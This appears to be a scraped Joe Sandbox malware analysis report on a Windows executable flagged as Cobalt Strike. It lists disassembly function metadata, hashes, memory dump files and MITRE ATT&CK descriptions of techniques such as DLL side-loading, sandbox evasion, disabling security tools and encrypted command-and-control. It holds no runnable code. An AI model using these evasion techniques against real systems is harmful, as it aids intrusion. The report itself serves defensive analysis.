String ID: cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs$lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs
API String ID: 232517740-1224199344
Opcode ID: 88da7737f8e90675926a91f3603cda0ea739d60ba8312b9406bc250868fd1047
Instruction ID: f6ef30ddf295a7aae39511dcaf4ca29b07cbe6a9b99e05a5240502291cfecbba
Opcode Fuzzy Hash: 88da7737f8e90675926a91f3603cda0ea739d60ba8312b9406bc250868fd1047
Instruction Fuzzy Hash: FF319025E09A46D8FB01DB61D8403F963B0AF65788F988432EA0D8F786DF3CE556D384

Function 00007FF66DFC5040 Relevance: 5.2, APIs: 4, Instructions: 177COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66DFC511A
memcpy.MSVCRT ref: 00007FF66DFC5130
memcpy.MSVCRT ref: 00007FF66DFC5293
memcpy.MSVCRT ref: 00007FF66DFC52A9

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 53d72ceed66aef2761e36a819b4ac461623abee5d8dc007600090a72f0b6625e
Instruction ID: a16117399a4f014fba3135441c24afc30b269e6cda92090226dce539a775e43e
Opcode Fuzzy Hash: 53d72ceed66aef2761e36a819b4ac461623abee5d8dc007600090a72f0b6625e
Instruction Fuzzy Hash: 41816972608B92D1EA20CB15E1407EE7B71EB55B84F448036DF8D5BB4AEF39E1A6C700

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Z9fvmHepQC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
Z9fvmHepQC.exe

Function 00007FF66DFA1180 Relevance: 10.6, APIs: 7, Instructions: 138
sleepstringCOMMON

Function 00007FF66E0887FC Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 492
COMMON

Function 00007FF66E0C8F00 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 160
COMMON

Function 00007FF66E205718 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
COMMON

Function 00007FF66DFA289D Relevance: 9.4, APIs: 2, Strings: 4, Instructions: 374
COMMON

Function 00007FF66E0DE420 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 224
COMMON

Function 00007FF66E05557E Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 224
COMMON

Function 00007FF66E106720 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Function 00007FF66E106700 Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Function 00007FF66DFAAEE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77
threadCOMMON

Function 00000215D76F7B9C Relevance: 1.6, APIs: 1, Instructions: 149
libraryCOMMON